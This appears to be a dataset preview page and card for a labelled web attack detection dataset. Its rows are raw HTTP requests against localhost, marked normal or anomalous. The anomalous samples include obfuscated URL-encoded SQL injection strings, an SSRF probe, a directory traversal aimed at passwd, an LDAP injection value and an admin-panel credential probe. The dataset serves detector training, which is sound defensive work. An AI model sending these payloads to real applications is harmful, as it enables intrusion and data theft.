Cookie: JSESSIONID=65892C818D9F4F2148A7A7CD4FA901C1
Host: localhost:3000
Connection: close | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=file://0.0.0.0:25 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=CF9ADC542BEC8473672250FCCA5DF45D
Host: localhost
Connection: close | anomalous | Server_Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: be4812aa-c553-4976-b0e8-f42e1422e446 | normal | none |
GET /rest/products/search?q=%2D%39%30%34%33%27%2F%2A%21%4F%72%2A%2F%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%28%2F%2A%21%43%61%53%65%2A%2F%2F%2A%21%57%68%45%6E%2A%2F%28%38%36%30%34%3D%37%34%31%36%29%2F%2A%21%74%48%65%6E%2A%2F%2F%2A%21%6E%55%6C%4C%2A%2F%2F%2A%21%65%6C%73%45%2A%2F%43%54%58%53%59%53%2E%44%52%49%54%48%53%58%2E%73%4E%28%31%2C%38%36%30%34%29%2F%2A%21%65%4E%44%2A%2F%29%2F%2A%21%66%52%4F%6D%2A%2F%2F%2A%21%44%55%41%6C%2A%2F%29%2F%2A%21%69%53%2A%2F%2F%2A%21%6E%55%6C%4C%2A%2F%2F%2A%21%61%4E%44%2A%2F%27%78%65%59%71%27%3D%27%78%65%59%71 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 474bad5d-ef7d-4da5-b859-9467c965033e | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 69127516-4a51-4250-b1a5-e595379ac2e6 | normal | none |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=FD896EA73B0B3DB82A644E16EB6F3197
Referer: http://malicious.com/%2e.%c0%qf%2e.%c0%qfetc%c0%qfpasswd
Host: localhost
Connection: close | anomalous | Directory_Traversal |
GET /rest/products/search?q=%74%65%73%74%22%29%2F%2A%21%41%73%2A%2F%6B%6E%6A%73%2F%2A%21%57%68%65%72%45%2A%2F%33%37%39%31%3D%33%37%39%31%2F%2A%21%41%6E%44%2A%2F%52%6F%77%28%39%33%38%39%2C%31%36%39%30%29%2F%2A%21%4E%4F%74%2A%2F%2F%2A%21%62%65%74%77%65%45%4E%2A%2F%30%2F%2A%21%41%6E%44%2A%2F%28%2F%2A%21%53%65%6C%45%43%74%2A%2F%63%6F%75%4E%54%28%2A%29%2C%63%6F%4E%43%61%54%28%30%78%37%31%37%30%36%32%36%62%37%31%2C%28%2F%2A%21%53%65%6C%45%43%74%2A%2F%28%65%4C%74%28%39%33%38%39%3D%39%33%38%39%2C%31%29%29%29%2C%30%78%37%31%36%32%37%30%37%61%37%31%2C%46%6C%4F%6F%72%28%52%41%6E%44%28%30%29%2A%32%29%29%78%2F%2A%21%66%52%4F%4D%2A%2F%28%2F%2A%21%53%65%6C%45%43%74%2A%2F%31%37%31%38%2F%2A%21%75%4E%49%6F%4E%2A%2F%2F%2A%21%53%65%6C%45%43%74%2A%2F%33%32%31%38%2F%2A%21%75%4E%49%6F%4E%2A%2F%2F%2A%21%53%65%6C%45%43%74%2A%2F%33%31%38%35%2F%2A%21%75%4E%49%6F%4E%2A%2F%2F%2A%21%53%65%6C%45%43%74%2A%2F%32%38%33%37%29%61%2F%2A%21%47%52%6F%75%70%2A%2F%2F%2A%21%42%79%2A%2F%78%29%2D%2D%2F%2A%2A%2F%6B%78%44%51 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
GET /manager/html HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Authorization: Basic UUNDOmtkc3hj
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=52CA975E833D609B088C09A856387A2D
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 26
id=sn%2Auser&submit=Submit | anomalous | LDAP_Injection |
GET /?ref=5a49f335-602c-4b8c-a575-3a1f326f62b2&session_token=5646 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 5a49f335-602c-4b8c-a575-3a1f326f62b2 | normal | none |
End of preview. Expand in Data Studio
web-attack-detection-dataset
A comprehensive dataset for web attack detection and classification, containing balanced HTTP traffic data with various attack types.
This dataset includes:
- Normal HTTP requests for benign traffic
- Anomalous HTTP requests representing different attack vectors
- 16 different attack types including SQL injection, XSS, LFI, etc.
- Balanced distribution to prevent overfitting
Dataset Information
- Training set: 105,757 records (11.5 MB)
- Validation set: 15,855 records (1.7 MB)
- Total records: 121,612
- Attack types: 16 categories
- Format: Apache Parquet (compressed)
Data Format
- raw-request: Raw HTTP request string
- label: Classification label ("normal" or "anomalous")
- attack_type: Specific attack type (empty for normal requests)
Usage
from datasets import load_dataset
# Load the dataset
dataset = load_dataset("web-attack-detection-dataset")
# Access train and test splits
train_data = dataset['train']
test_data = dataset['test']
# Dataset info
print(f"Training samples: {len(train_data)}")
print(f"Test samples: {len(test_data)}")
Statistics
- Training set: 105,757 records (11.5 MB)
- Validation set: 15,855 records (1.7 MB)
- Total records: 121,612
- Attack types: 16 categories
- Format: Apache Parquet (compressed)
License
Please check the original dataset license and usage terms.
- Downloads last month
- 5